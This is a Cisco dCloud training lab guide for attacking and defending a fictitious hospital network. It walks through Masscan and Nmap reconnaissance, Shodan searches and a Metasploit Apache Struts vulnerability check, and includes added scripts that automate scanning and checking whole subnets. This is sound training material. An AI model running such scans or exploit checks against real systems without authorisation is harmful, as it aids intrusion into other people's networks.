
Cyber Resilience Platform v5.0
Published: January 13, 2023
    About

    This Lab

    The Cyber Resilience Platform Lab is built as a training platform, based on Cisco Security Integrated Threat Defense (ITD) architecture and solutions. In this lab, you experience lifelike cyber security attacks in a virtualized enterprise lab environment where you play the roles of attacker and defender.

    Important: This content includes pre-release software, and you may experience issues with some features. The included documentation was not verified by dCloud. Check Cisco dCloud regularly for new releases.

    Requirements

    The table below outlines the requirements for this preconfigured demonstration.

    Required                              Optional
    Laptop with network capabilities      Cisco AnyConnect®
                                          Second device for reading lab notes

    This Solution

    The Cyber Resilience Platform delivers hands-on learning in simulated modules that represent different Attack and Defend scenarios, where you play both the Victim and the Attacker to learn options for open-ended attacks and defense. The first scenario in this guide is mandatory because it covers the setup and testing required to set the stage. The scenarios that follow are designed as independent, standalone modules.

    Note: 

    As an instructor, you have the ability to customize clinic deliveries to your audience, as you see appropriate in this lab.

    Topology

    This content includes preconfigured users and components to illustrate the scenarios and features of the solution. Most components are fully configurable with predefined administrative user accounts. You can see the IP address and user account credentials for a component by clicking the component icon in the Topology menu of your active session, and in the scenario steps that require them. All equipment and exploitation are real, meaning that if you do not execute steps or commands correctly, attack and defense measures may not work. Working outside the scope of the lab is welcome, including upgrading or downgrading software, launching additional attacks and gaining experience with the tools provided. Support, however, only covers tasks within each provided module.

    dCloud Topology

    Before You Present

    Cisco dCloud strongly recommends that you perform the tasks in this document with an active session before presenting in front of a live audience. This will allow you to become familiar with the structure of the document and content.

    It may be necessary to start or schedule a new session after following this guide in order to reset the environment to its original configuration.

    PREPARATION IS KEY TO A SUCCESSFUL PRESENTATION.

    Get Started

    Follow the steps to schedule a session of the content and configure your presentation environment.

    Procedure


    1. Initiate your dCloud session. [Show Me How]

    Note: 

    It may take up to 10 minutes for your session to become active. Click the red notification icon (bell) to check.

    2. Click My Hub in dCloud and locate the demo named: Cyber Defense Clinic Lab

    3. Click the View button to start the demo.


    Scenarios

    HackMDs.com: Connect and Set Up (Required)

    Value Proposition: Welcome to HackMDs! As the new security administrator for our fictitious hospital entity, it will be important to familiarize yourself with the resources located within. This scenario walks through connecting to the model enterprise and ensuring that the security tools used today are up and available.

    At the end of this scenario, you will have access to the lab environment and a map to the resources you will need for using the tools within this lab.

    Connect to the Lab Jumphost

    Prerequisite: We recommend using a web browser rather than AnyConnect for this lab.

    If you must use the AnyConnect SSL connection option to access the dCloud labs, take the time to download the latest RDP (Remote Desktop) client for your Windows or Mac Operating System.

    • If you are using Windows, download the latest Microsoft Windows Remote Desktop Connection Manager RDP client software version. Use a search engine to find the latest version if needed.

    • If you are using Mac, download the latest Microsoft Remote Desktop for Mac RDP client software version. The software is readily available on the Apple App Store. Also, you can use a search engine to find the latest version.

      In the CDC clinic environment, notice the clock at the top right of the screen. This will show the remaining time available for completing the lab. The Details tab displays information about your session, such as start, end and login credentials. The Resources tab provides links to support documentation.

    Procedure


    1. From the oob server, click the URL at the bottom right, as shown below.

    Important: 

    Log in to the oob-server with the credentials shown in Step 2.

    2. Log in with the username dcloud and the password (your session ID).

    3. Click the Servers tab to show all the systems running in the CDC environment. You can turn systems on or off from this location if needed.

    4. Click the Details tab at the top left, and then write down your session ID number. You will need your session ID number as your password to access the lab. In this example, the number is Cisco12345.

    5. You should now be in the Jump environment and see links to the Cyber Defense Clinic lab resources. Click any resource to access it.

    6. If you are in a server and want to leave it, click the Back button (the left arrow at the top left of your screen) in your browser to return to the Guacamole server.

    7. When you click the Back button in your web browser to leave an active session, the connection will appear under the Recent Connections area.


    Validate Enterprise Systems

    You validate enterprise systems to ensure that the systems that will be attacked are properly operating and available within this lab environment. We will be accessing the following resources:

    Enterprise Resources Table

    Host                           IP Address       Web Address            Username           Password
    Unsecure hackmds.com           198.19.20.5      www.hackmds.com        N/A                N/A
    Secured hackmds.com            198.19.20.7      secured.hackmds.com    N/A                N/A
    WOW (Workstation on Wheels)    198.19.30.100    -                      HACKMDS\nurse      C1sco12345
    DR. Workstation                198.19.30.101    -                      HACKMDS\dhowser    C1sco12345
    Contractor Workstation         198.18.133.10    -                      HACKMDS\dhowser    C1sco12345
    Kali Linux Workstation         198.18.133.6     -                      root               C1sco12345
    IT Workstation                 198.19.30.102    -                      HACKMDS\IT         C1sco12345

    Procedure


    1. When logged in to Guacamole, verify that you can automatically log in to the Contractor, DR, IT, Kali Linux, Workstation on Wheels and Jumphost environments.

    2. If you are asked to log in to a system, enter the login name HACKMDS\dhowser and the password C1sco12345.

    3. When you have verified connectivity to all systems, select the Jumphost system to continue connectivity testing.

    4. From the Jumphost desktop, open the Firefox web browser. Multiple tabs will open, which simplifies accessing all necessary resources.

    5. Go to the last open tab in Firefox to verify that you can see the http://www.hackmds.com/ website.

    Note:  At this point, you have successfully validated and connected to HackMDs.com enterprise management platforms.

    Validate Security Systems

    You validate security systems to ensure that the security tools available to HackMDs.com are running and available within the lab.

    Resources Table

    Host                                   IP Address          Web Address                             Username                  Password
    Identity Services Engine               198.19.10.4         ise.ad.hackmds.com                      admin                     C1sco12345
    Firepower Management Center            198.19.10.5         fmc.ad.hackmds.com                      admin                     C1sco12345
    Stealthwatch Management Console (SMC)  198.19.10.6         smc.ad.hackmds.com                      admin                     C1sco12345
    Email Security Appliance (ESA)         198.19.20.8         smtp.ad.hackmds.com                     admin                     C1sco12345
    Rapid7 InsightVM                       198.19.10.3:3780    scanner.ad.hackmds.com                  admin                     C1sco12345
    Splunk                                 198.19.10.15        splunk.add.198.19.10.15                 admin                     C1sco12345
    IBM QRadar                             198.19.10.18        qradar.ad.hackmds.com                   admin                     C1sco12345
    Radware APSolute Vision                198.19.10.22        vision.ad.hackmds.com                   admin                     C1sco12345
    Radware Alteon / AppWall               198.19.10.24        alteon.ad.hackmds.com/appwall-webui/    admin                     C1sco12345
    Tetration                              198.19.193.228      -                                       mslab@dcloud.cisco.com    C1sco12345!
    Cisco Duo                              -                   Admin.duosecurity.com                   Dynamically generated     Dynamically generated
    Public AMP / SecureX                   -                   auth.amp.cisco.com                      Dynamically generated     Dynamically generated
    Splunk Platform                        198.19.10.150       -                                       none                      -

    Procedure


    1. Make sure you are logged in to the Jumphost PC.

    2. From the Jumphost PC desktop, go back to the Firefox browser, or reopen the browser if needed.

    3. You should have browser tabs already open for: Firepower Management Center (FMC), Private AMP server, Stealthwatch Management Console (SMC), Identity Services Engine, Splunk, Splunk Phantom, IBM QRadar, Rapid7 InsightVM, Cisco ESA, Radware APSolute Vision, Radware AppWall, Tetration and the HackMDs website.

    Tip: 

    You can also access each of the security systems by opening browser sessions to the IP addresses listed in the Resources table.

    4. Browse to the Cisco Firepower Management Center (FMC) at https://fmc.hackmds.com/, or switch to the first tab.

    5. Log in with the username admin and the password C1sco12345.

    Note:  If you receive a message with the phrase “Existing Session Detected” or “Session Expired,” click the Proceed button.

    6. Validate that you are now connected to the Firepower Management Center dashboard.

    7. Next, repeat the process for the remaining tabs.

    Tab                                           Username                  Password
    Cisco Stealthwatch Management Console (SMC)   admin                     C1sco12345
    Cisco Identity Services Engine (ISE)          admin                     C1sco12345
    Cisco Email Security Appliance (ESA)          admin                     C1sco12345
    Rapid7 InsightVM                              admin                     C1sco12345
    QRadar                                        admin                     C1sco12345
    Splunk                                        admin                     C1sco12345
    Splunk Platform                               admin                     C1sco12345
    Radware Alteon/AppWall                        admin                     C1sco12345
    Tetration                                     mslab@dcloud.cisco.com    C1sco12345

    Note: 

    Congratulations! you have successfully connected to HackMDs.com security management platforms.


    Target Reconnaissance: Gather Information about Vulnerabilities for a Future Attack

    Value Proposition: Reconnaissance is the first step to almost every cyber-attack you will encounter in the wild. Sometimes reconnaissance is a purposeful exercise where an attacker learns everything they can about a target. Other times, reconnaissance occurs at scale across the Internet to find the best potential targets. Passive reconnaissance happens when an attacker gathers information about a target without the target’s knowledge. Active reconnaissance happens when the attacker probes/investigates the target. Keep in mind that the easier it is for an attacker to learn about you, the more likely it is that the attacker can identify a method to breach your defenses. For this reason, it is highly recommended that you implement security that can obscure what resources you are utilizing. Cyber Defense helps you avoid overexposure of information to potential threats.

    This scenario will set the stage for all other scenarios, because information obtained from reconnaissance can lead to various forms of attacks, depending on how the target is identified as vulnerable. Students will perform a simple port and vulnerability scan to represent one of the many methods real target research is performed. Real world research would take much more time and involve various methods to learn as much as the attacker could obtain about the potential target.

    At the end of this scenario, you will have a basic understanding of how attackers research targets to prepare for future attacks. You will be introduced to scanning a target for open ports with Masscan, a port scanner with a familiar Nmap-like syntax, and to evaluating a target for a vulnerability with a custom script from the attacker's own toolchain. You will also play the defender role by scanning your network for unknown assets and evaluating those assets with a popular vulnerability scanner from Rapid7 called InsightVM (formerly Nexpose).

    This is your first lab as the attacker!

    Lab Resources

    • Resource 1: Kali Linux Rolling Edition (includes Nmap and Masscan tools)

    • Resource 2: Ubuntu Server hosting Rapid 7 InsightVM

    Web Reconnaissance using Shodan

    Shodan is a search engine for hackers. You can identify specific devices on the internet as well as find details about such devices using data collected from service banners. Shodan works by crawling the internet for any publicly accessible device and continuously updating its database of everything on the Internet.

    As devices are discovered by Shodan, users of Shodan can enter search queries for specific details such as a certain device type. As an attacker, you can use Shodan to identify vulnerable servers in your target environment. You can also cast a wide net to identify any devices with a specific vulnerability.

    Many real-world attackers are not targeting a specific company, but rather searching the internet for opportunities. Consider the next lab, Smash and Grab as an example of this type of drive by attack where HackMDs happens to have one of its vulnerable servers discovered by an attacker using Shodan.

    Access Shodan

    Procedure


    The first thing to do is browse to https://www.shodan.io/. You can search without logging in; however, you will have some limitations without having a free account. You can click Create a free account if you want to. There is a premium version that you can subscribe to, as well. The premium version gives you access to an API, Maps, App integrations, and more. For the purposes of this lab, you are not required to register for the free or paid account, but welcome to try them out if interested.


    Popular Shodan Searches

    Procedure


    1. Search for topics you are interested in, such as product names, common error messages, known banners, etc.

    2. To explore some of the most frequent searches on the Shodan site, click the Explore button. Enjoy exploring the world-wide web of vulnerable things.

    Bonus: Advanced Shodan search queries

    If you would like to explore some advance search queries options in Shodan, then you will need to FIRST create a FREE user account.

    See examples below of possible advanced searches queries you can run once you have created your FREE account.

    Shodan Filters

    • https port:443 – This query will bring up a list of servers running port 443.

    • netcam – This query would bring up a list of netcam devices.

    • title: “Outlook Web Access" port:443,80 – This query will provide a list of sites hosting Microsoft OWA.

    • webcamxp country:SE – This search would bring up a list of webcams in Sweden.

    Additional filters you can use to narrow down your search results:

    • City: Find devices in a specific city.

    • Country: Find devices in a specific country.

    • Geo: You can pass it coordinates.

    • Hostname: Find values that match the hostname.

    • Net: Search on an IP or /x CIDR.

    • OS: Search on operating system

    • Port: Find specific ports that are open.

    • Before/After: Find results within a timeframe.

    Attacker Reconnaissance using Masscan

    Masscan is known as an extremely fast internet port scanner. Masscan is not designed with a pretty GUI interface like some of the options available for port scanners like NMAP. We still see many administrators lead with NMAP to find hosts on their networks as they have for years. From the attacker side, we are finding many attackers now use Masscan as their tool of choice for the following reasons:

    • Uses NMAP syntax (familiarity)

    • Faster and more efficient than NMAP

    • Masscan can scan the entire internet in hours depending upon your internet connectivity.

    Masscan has the following key features:

    • Portability (Windows, Mac OS X)

    • PF_RING ZC support from ntop to produce more than 2 million packets per second

    • Banner Grabbing Support

    • IP Spoofing

    • Configuration file loading

    • Syn-only scan

    • Does not ping the hosts first

    • Feature equivalent to running nmap in the following mode:

    $ nmap -Pn -sS -n --randomize-hosts --send-eth <hosts>

    For additional Masscan documentation, please see GitHub – https://github.com/robertdavidgraham/masscan

    Note: We have limited Masscan to never go beyond 10,000 packets per second. Masscan can overwhelm a network quickly!

    In this lab, you will access the attacker server running Kali Linux through the Guacamole (GUAC) jump point. Masscan is installed directly on the Kali server and is run from the Kali Linux command line. A script that finds systems on the network is also located on the Desktop of the same host. The target you will be researching is the HackMDs DMZ servers on the 198.19.20.0/24 network.

    Note: The username for access to the Kali Linux attack server is root, and the password is C1sco12345.

    Reconnaissance using Masscan

    Procedure


    1. Connect to the Kali Linux attack server.

    2. Open a terminal: click the Terminal Emulator icon at the bottom of the Kali Linux desktop.

    3. Verify your target by running the following command:

    dig www.hackmds.com 

    This further validates that www.hackmds.com is hosted on the 198.19.20.0/24 network. In the real world, an attacker may or may not validate that the target owns the entire /24, but for the purposes of this lab, scan only the 198.19.20.0/24 network.

    4. Run the following command against the target to find all live hosts listening on ports 80, 443, 8080 and 8443:

    masscan -p80,443,8080,8443 198.19.20.0/24

    You will see that there are multiple live hosts on that network. Two will be your targets!

    • 198.19.20.5 – This seems to be a hackmds.com DMZ web server that could be interesting.

    • 198.19.20.8 – This seems to be an accidentally exposed DMZ anti-spam filter server.


    Discover a vulnerability using home grown tools

    Now that you have scanned the HackMDs DMZ with a port scanner, an attacker may look for potential vulnerabilities with scripts that they created for specific exploits found in their personal tool kit. As the attacker in this scenario, you will be simulating this behavior. Here is the script that you will be using:

    msfconsole -x "use exploit/multi/http/struts2_content_type_ognl; set RHOST $host; set RPORT 80; set TARGETURI /clientportal/fileupload/upload.action; check; exit" | grep vulnerable 
    Note:  You do not need to run this code manually. Just use the script already created using the steps below.

    This script is using Rapid7’s Metasploit module for the recent 2017 OGNL (Object-Graph Navigation Language) struts vulnerability. It looks at hardcoded paths specifically for the upload action vulnerability. The only variable in this script is the $host variable, which can be modified or hardcoded for www.hackmds.com. The script will check to see if a target is exploitable to this specific vulnerability and print out whether it is vulnerable or not.

    Could an attacker do it by hand? Yes, but it is time consuming and tedious. Attackers create scripts for well-known HTTP URIs, or alternatively spider your website and try every single link. Many exploit kits use the same tactics, targeting specific Flash- and Java-based vulnerabilities to drop malware on systems that are unfortunate enough to be vulnerable.

    Procedure


    1. Open the terminal application by clicking the “Terminal Emulator” icon at the bottom of the Kali Linux desktop.

    2. Change to the Desktop directory:

    root@kali:~# cd /root/Desktop

    3. Execute the attacker script with the following command, directing the scanner at the 198.19.20.5 server, which is www.hackmds.com:

    root@kali:~/Desktop# ./exploit-finder.sh 

    4. Like many scripts found on hacker forums and elsewhere on the internet, this script provides limited information. It has been hardcoded to use www.hackmds.com as the default target. The script itself does not spider or look at all links. How does it work? It just uses Metasploit to check whether one URL is vulnerable to this one vulnerability.

    5. On closer inspection, we see that the following URL is vulnerable to our Apache Struts2 vulnerability: http://www.hackmds.com/clientportal/fileupload/upload.action.

    Here we see that 198.19.20.5:80 is vulnerable, which, if opened in a web browser, is the HackMDs website!
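    The Masscan sweep in the previous procedure and the exploit-finder.sh check above are two halves of one attacker workflow. As an added example (not one of the lab's own scripts), the following shell script joins them: it runs Masscan with an explicit rate cap, parses the list output into host/port pairs, and runs the same Metasploit check against every pair rather than only the hard-coded www.hackmds.com. It assumes masscan and msfconsole are on PATH, as on the lab's Kali host; the Masscan output at the bottom is a constructed sample so the parsing and the check loop can be tried without scanning anything.

```shell
#!/usr/bin/env bash
# Added example for this lab guide (not part of the dCloud content): chain the
# Masscan sweep from "Reconnaissance using Masscan" with the Metasploit "check"
# that exploit-finder.sh runs, so every web port Masscan reports gets checked.
# Assumptions: masscan and msfconsole are on PATH (as on the lab's Kali host);
# the range, ports, rate cap and Struts URI are the ones stated in the lab text.
set -u

TARGET_NET="${TARGET_NET:-198.19.20.0/24}"
WEB_PORTS="${WEB_PORTS:-80,443,8080,8443}"
RATE="${RATE:-1000}"   # packets/second; the lab caps Masscan at 10,000
TARGETURI="/clientportal/fileupload/upload.action"

# Masscan sweep with an explicit rate cap, written as "list" output.
# Each result line has the form: open tcp <port> <ip> <timestamp>
scan_web_ports() {
    masscan -p"$WEB_PORTS" "$TARGET_NET" --rate "$RATE" -oL "$1"
}

# Reduce Masscan list output to sorted, unique "<ip> <port>" pairs, skipping
# the "#masscan" / "# end" comment lines and anything that is not an open TCP port.
parse_masscan_list() {
    awk '$1 == "open" && $2 == "tcp" { print $4, $3 }' "$1" | sort -u
}

# The check from exploit-finder.sh, parameterised on host and port. Succeeds
# (exit 0) when Metasploit's check output contains "vulnerable", as the lab's
# grep does (e.g. "The target is vulnerable."); prints nothing otherwise.
msf_struts_check() {
    local host="$1" port="$2"
    msfconsole -q -x "use exploit/multi/http/struts2_content_type_ognl; set RHOST $host; set RPORT $port; set TARGETURI $TARGETURI; check; exit" \
        | grep -i 'vulnerable'
}

# Run a checker (a function or command taking "<host> <port>") against every
# pair read on stdin and print one "<host>:<port> <verdict>" line per target.
check_targets() {
    local checker="$1" host port
    while read -r host port; do
        if "$checker" "$host" "$port" >/dev/null 2>&1; then
            echo "$host:$port VULNERABLE"
        else
            echo "$host:$port not vulnerable"
        fi
    done
}

# Full attacker flow on the lab network: sweep, parse, check.
run_recon() {
    local scan
    scan="$(mktemp)"
    scan_web_ports "$scan"
    parse_masscan_list "$scan" | check_targets msf_struts_check
    rm -f "$scan"
}

# Constructed sample of Masscan -oL output (not real scan data) so the parsing
# and the check loop can be exercised without touching the network.
SAMPLE_SCAN="$(mktemp)"
cat > "$SAMPLE_SCAN" <<'EOF'
#masscan
open tcp 80 198.19.20.5 1673600001
open tcp 443 198.19.20.7 1673600001
open tcp 80 198.19.20.8 1673600002
open tcp 80 198.19.20.5 1673600003
# end
EOF
trap 'rm -f "$SAMPLE_SCAN"' EXIT

# Stand-in checker for the sample: treats only www.hackmds.com:80 as vulnerable,
# which is the result the lab's exploit-finder.sh reports.
sample_check() { [ "$1:$2" = "198.19.20.5:80" ]; }

parse_masscan_list "$SAMPLE_SCAN" | check_targets sample_check
```

    As written, the script only parses the constructed sample; on the Kali host, source it and call run_recon to sweep 198.19.20.0/24 for real, keeping RATE well under the lab's 10,000 packets-per-second cap. Deduplicating with sort -u matters because Masscan can report the same port twice when a SYN-ACK is retransmitted.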


    Reconnaissance using NMAP

    Next, we will show how many network administrators perform reconnaissance on their own environments today. NMAP is the most popular open source network mapping and auditing tool.

    Example syntax of scanning a single host over IPv4:

    # nmap -sT <IP address>

    NMAP features include:

    • Host discovery – Identifying hosts on a network.

    • Port scanning – Enumerating the open ports on target hosts.

    • Version detection – Interrogating network services on remote devices to determine application name and version.

    • OS detection – Determining the operating system and hardware characteristics of network devices.

    • Scriptable interaction with the target – using NMAP Scripting Engine (NSE) and Lua programming language.

    Several types of scan techniques are available in NMAP:

    -sS TCP SYN scan | -sT Connect() scan | -sA ACK scan | -sW Window scan

    -sO IP protocol scan | -sN TCP Null scan | -sF FIN scan | -sX Xmas scan

    SYN scanning is used to determine the state of a TCP port without establishing a full connection.

    References

    • For more information on NMAP port scanning techniques, go to: https://nmap.org/book/man-port-scanning-techniques.html.

    • SANS.Org NMAP cheat sheet: https://blogs.sans.org/pen-testing/files/2013/10/NmapCheatSheetv1.0.pdf

    • See the NMAP cheat sheet for less noisy methods of performing similar scans while avoiding detection.

    Defender Reconnaissance Steps

    In this lab, you will access the attacker server running Kali Linux to run all reconnaissance activity. NMAP is installed directly on the Kali server and will be run from the Kali Linux terminal command line.

    The Rapid7 InsightVM vulnerability scanner is installed on the Ubuntu attacker server at 198.18.133.5 that will be accessed from a web browser session on the Kali Linux server. The target will be the same HackMDs DMZ server 198.19.20.5 that you previously found as the attacker.

    • To access Kali Linux attack server: Username is root and password is C1sco12345.

    • To access Rapid7 InsightVM : Username is root and password is C1sco12345.

    Reconnaissance using NMAP

    Procedure


    1. While in the Kali Linux system, open the Nmap application by clicking the screen-with-arrow icon (Application Finder) at the bottom of the screen. This is the second to last icon.

    Note:  To do this from a command line, open a terminal and type nmap. Some people also prefer to use Zenmap, which is a GUI-based version of Nmap.

    2. Type nmap in the search window to see the available Nmap program options. Select the Nmap program from the list shown and click the Launch button to start the Nmap application.

    3. Run the following connect scan command against the web server hosted by HackMDs.com:

    nmap -sT 198.19.20.5

    4. Next, run this UDP scan command against the target web server hosted by HackMDs.com:

    nmap -sU -p 123,161,162 198.19.20.5

    Note:  For a better understanding of the STATE reported for each port, see: https://nmap.org/book/man-port-scanning-basics.html

    A connect scan (-sT) establishes a full TCP connection to each target port by issuing the connect system call, the same high-level system call that web browsers, P2P clients and most other network-enabled applications use to establish a connection. A UDP scan (-sU) works by sending a UDP packet to every targeted port; because UDP has no handshake, a port that never answers is reported as open|filtered, so UDP results need more interpretation than TCP results. DNS, SNMP and DHCP (ports 53, 161/162 and 67/68) are three of the most common UDP services; the command above also probes NTP (123).


    Use Rapid 7 InsightVM for Discovery

    Now that you have scanned the HackMDs DMZ with a port scanner, you will look for potential vulnerabilities using the InsightVM tool from Rapid7. InsightVM is installed on a separate Ubuntu attack server that you will access using a web browser session from the Kali Linux server. As with the port scanning exercise, our goal is to identify potential weaknesses.

    Note:  We selected these scans since they are quick to execute. See the optional advanced section of this scenario for more detailed scans. The advanced scan options will take longer to complete.

    Procedure


    1. From the Kali Linux desktop, look at the bottom of the screen and select the web browser icon to open the iceweasel web browser application.

    2. In the browser, click the Rapid 7 InsightVM bookmark link to access the Rapid 7 InsightVM application.

    Note:  If you cannot find the bookmark link, you can manually type the URL: https://scanner.hackmds.com:3780.

    3. Log in with the username admin and the password C1sco12345.

    Click X to close the pop-up notice about activation.

    4. In the top bar on the home screen, select Create > Site. This brings up the site creation screen.

    5. Use the following parameters for the General configuration section.

    • Name: Target

    • Importance: Normal

    • Description: Target HackMDs.com website

    • User-added Tags: None

    Note:  If InsightVM already has a site named HackMDs, add -1 or -2 at the end of the site name.

    6. Next, click the Assets tab and, under INCLUDE, in the text box that says "enter name, address, or range", type the target, which is the www.hackmds.com server.

    7. Click the TEMPLATES tab, and then select Full audit.

    8. Click the SAVE & SCAN button at the top right of the application window. Depending on your screen resolution, you might need to scroll to the right to find the Save & Scan button. If prompted with “Are you sure you want to Save & Scan?”, click the “Save & Scan” button.

    9. Now wait for the InsightVM site scan to complete, which could take 5-10 minutes. This is an opportune time to take a quick break.

    10. While you wait, the Scan Progress will display.

    Note:  If you clicked Save rather than Save & Scan in the previous step, click the magnifying glass at the top to search for your site (HackMDs), select the site and select to run the scan.

    11. When the scan has completed, scroll down to the “COMPLETED ASSETS” section of the report and click www.hackmds.com, representing the target system that we want to examine. This brings up the results of the scan that has just completed. The following example shows the number of potential vulnerabilities for the target system asset.

    12. Scroll through the report to the “VULNERABILITIES” section and see the list of vulnerabilities that InsightVM identified, including the Apache Struts vulnerabilities that exist on the target DMZ server.

    Note: 
    • If you do not see the Apache Struts vulnerability, it is likely that the Cisco Firepower IPS policy is already enabled and blocking InsightVM's probes, so it cannot see the existing Apache Struts vulnerabilities on the DMZ target server. This is a good thing, because it means Firepower has already stopped the attack traffic. However, we want to turn off this policy action for our vulnerability example to work. If you do not see this vulnerability after your scan is complete, see your lab instructor for instructions on how to change the Firepower IPS policy. You will cover this in the next scenario.

    • Real-world systems will have vulnerabilities. It is close to impossible to keep a system functional and useful without exposing it to some form of risk. Therefore, practices such as patch management are critical to reducing the chances of being compromised.

    13. To view additional detailed vulnerability information, select the first Apache Struts vulnerability link in the report.

    Note:  In the report details for this vulnerability, you can see under the “Description” section that this vulnerability is “remotely exploitable”. This is key to an attacker exploiting the target: our attacker needs a vulnerability that can be exploited remotely and without authentication.

    14. To get an idea of the other potential threats within HackMDs, click the Assets tab on the left to bring up the summary of every asset and its associated vulnerabilities. Take a few minutes to review the findings.

    15. Close the Kali Linux web browser session to the Rapid7 InsightVM application.

    Note:  Many real-world vulnerabilities can be found just by searching the Internet. As an example, the JBoss vulnerability associated with the SamSam ransomware can be found on systems by searching Google for the term /status&full=true.

    Summary

    This scenario showed how an attacker could perform research and reconnaissance on potential targets to identify vulnerabilities that can then be later exploited. Both attackers and defenders perform similar steps to accomplish these goals with slightly different tools and approaches. The scenarios that follow will show examples of attacks that will deliver exploits based on the results of your reconnaissance and vulnerability scanning.

    Feel free to explore additional NMAP and InsightVM tools and options as shown in the Bonus Section – Nmap Advanced Options section.

    Note: It is important to be aware that there really is not a 100% guaranteed way to defend against an attacker researching you. You can limit your exposure with technology, such as content filtering, firewalls, etc. However, there will always be some level of exposure that will always exist as you open your systems for external use.

    Congratulations! You have now completed this scenario.

    Bonus Section - Nmap Advanced Options

    Procedure


    1. Scan a network to find which hosts are up and running (-sP is the older name for -sn, a ping scan with no port scan):

    nmap -sP 198.19.20.0/24

    2. Scan for specific ports using the -p option, as in the following two examples:

    nmap -p 80 198.19.20.5

    nmap -p U:53,137,T:21-25,80,443 198.19.20.5

    3. Scan for the open ports on a specific target IP address:

    nmap -sS -p U:53,111,137,T:1-65535 --open 198.19.20.5

    Note that the U: ports in the last two commands are only probed if -sU is also given; without it, Nmap prints a warning and scans only the TCP ports.

    The reconnaissance information collected above (IP addresses and open TCP/UDP ports), along with additional information such as open-source intelligence gathered from social media (for example, Facebook, LinkedIn, etc.), helps the attacker build attack profiles for their targets. The next step is to look for known vulnerabilities in the targeted list, which we perform in the next scenario.
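    The defender's version of the same work, the unknown-asset sweep mentioned at the start of this scenario, is easy to script around Nmap's grepable output. The following shell script is an added example, not part of the lab: it saves a ping sweep in -oG format, compares the hosts that answered against an inventory file, and lists each host's open ports. It assumes nmap is on PATH and that inventory.txt (a hypothetical file with one known IP per line, which the lab does not provide) exists; the Nmap output and inventory embedded at the bottom are constructed samples so the parsing runs offline.

```shell
#!/usr/bin/env bash
# Added example for this lab guide (not part of the dCloud content): the
# defender side of the reconnaissance scenario. A ping sweep of a HackMDs range
# is saved in Nmap's grepable (-oG) format, hosts that answered are compared
# with an asset inventory, and open ports are listed per host.
# Assumptions: nmap is on PATH (true on the lab's Kali host); inventory.txt is a
# hypothetical file with one known IP per line that the lab does not provide.
set -u

# Sweep a range and save grepable output; -sn is the current name for the -sP
# ping scan used in the bonus section.
sweep() {
    nmap -sn -oG "$2" "$1"
}

# Port-scan the hosts listed in a file ($1), again saving grepable output ($2).
port_scan() {
    nmap -sS -p 80,443,8080,8443 --open -iL "$1" -oG "$2"
}

# Every host Nmap reported as up, one IP per line.
# Grepable host lines look like: Host: 198.19.20.5 (www.hackmds.com)<TAB>Status: Up
hosts_up() {
    awk '/Status: Up/ { print $2 }' "$1" | sort -u
}

# Hosts that are up but absent from the inventory file ($2): the unknown assets.
unknown_hosts() {
    hosts_up "$1" | awk -v inv="$2" 'FILENAME == inv { known[$1]; next } !($1 in known)' "$2" -
}

# Open ports per host from grepable port-scan lines, printed as
#   <ip> <port>/<proto> <service>
# Port entries look like 80/open/tcp//http/// and are comma separated.
open_ports() {
    awk -F'\t' '/Ports:/ {
        split($1, h, " "); ip = h[2]
        n = split($2, entries, ", ")
        for (i = 1; i <= n; i++) {
            sub(/^Ports: /, "", entries[i])
            split(entries[i], f, "/")
            if (f[2] == "open") print ip, f[1] "/" f[3], f[5]
        }
    }' "$1"
}

# Constructed sample grepable output and inventory (not real scan data), so the
# parsing can be exercised without running nmap.
SAMPLE_NMAP="$(mktemp)"
INVENTORY="$(mktemp)"
trap 'rm -f "$SAMPLE_NMAP" "$INVENTORY"' EXIT
{
    printf '# Nmap 7.93 scan initiated as: nmap -sS -p 80,443 -oG - 198.19.20.0/24\n'
    printf 'Host: 198.19.20.5 (www.hackmds.com)\tStatus: Up\n'
    printf 'Host: 198.19.20.5 (www.hackmds.com)\tPorts: 80/open/tcp//http///, 443/closed/tcp//https///\n'
    printf 'Host: 198.19.20.7 (secured.hackmds.com)\tStatus: Up\n'
    printf 'Host: 198.19.20.7 (secured.hackmds.com)\tPorts: 80/closed/tcp//http///, 443/open/tcp//https///\n'
    printf 'Host: 198.19.20.8 ()\tStatus: Up\n'
    printf 'Host: 198.19.20.8 ()\tPorts: 80/open/tcp//http///, 443/closed/tcp//https///\n'
    printf '# Nmap done -- 256 IP addresses (3 hosts up) scanned\n'
} > "$SAMPLE_NMAP"
# Inventory knows the two web servers but not the anti-spam host at .8
printf '198.19.20.5\n198.19.20.7\n' > "$INVENTORY"

echo "Hosts up:";         hosts_up "$SAMPLE_NMAP"
echo "Not in inventory:"; unknown_hosts "$SAMPLE_NMAP" "$INVENTORY"
echo "Open ports:";       open_ports "$SAMPLE_NMAP"
```

    On the lab network, run sweep 198.19.20.0/24 dmz.gnmap, then unknown_hosts dmz.gnmap inventory.txt; any IP it prints is a host answering on your DMZ that nobody recorded, which is exactly how the accidentally exposed anti-spam server at 198.19.20.8 would surface. Feed the hosts_up list to port_scan to see what each of them exposes.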

    Congratulations! You have completed this Bonus Section.


    Smash and Grab: Attack Public Network Services Through the Front Door

    Value Proposition: In this scenario, we take the approach of attacking an Internet-facing web server, which we call smash and grab. The premise is that Mr. Orange (aka YOU), the attacker, has already performed reconnaissance (scenario 2) using various network and vulnerability scanners.

    First, Mr. Orange ran the Masscan tool against the HackMDs DMZ and found a web server listening on port 80. Next, Mr. Orange ran a custom vulnerability scanner and discovered additional potential high-risk vulnerabilities. Mr. Orange then researched the most critical vulnerability found, which is the version of Apache Struts running on the Apache Tomcat web server in the DMZ.

    In this scenario, Mr. Orange uses Metasploit to weaponize an exploit against the Struts vulnerability. This gives Mr. Orange command line access, or a "shell", on the vulnerable DMZ web server. The advanced section of this scenario shows how to use the compromised DMZ web server as a gateway to pivot deeper into other systems on the HackMDs network. You will also learn more about pivoting attacks in scenario 6.

    It is important to point out that real-world exploit development can take a lot of effort. Tools like Metasploit simplify exploitation by packaging complicated attacks so that lower skilled attackers (also known as script kiddies) can point and launch them without understanding the underlying exploit techniques.

    Outcome

    At the end of this scenario, you will have delivered a traditional server exploit using Metasploit. You will use Armitage, a GUI front end for Metasploit, to launch your attack: search for the Struts exploit module, configure its options, and launch it. When the attack is complete, you will have a working command shell on the DMZ web server, giving Mr. Orange full access to the resources on the HackMDs DMZ network.

    All Your DMZs R Belong to Us!

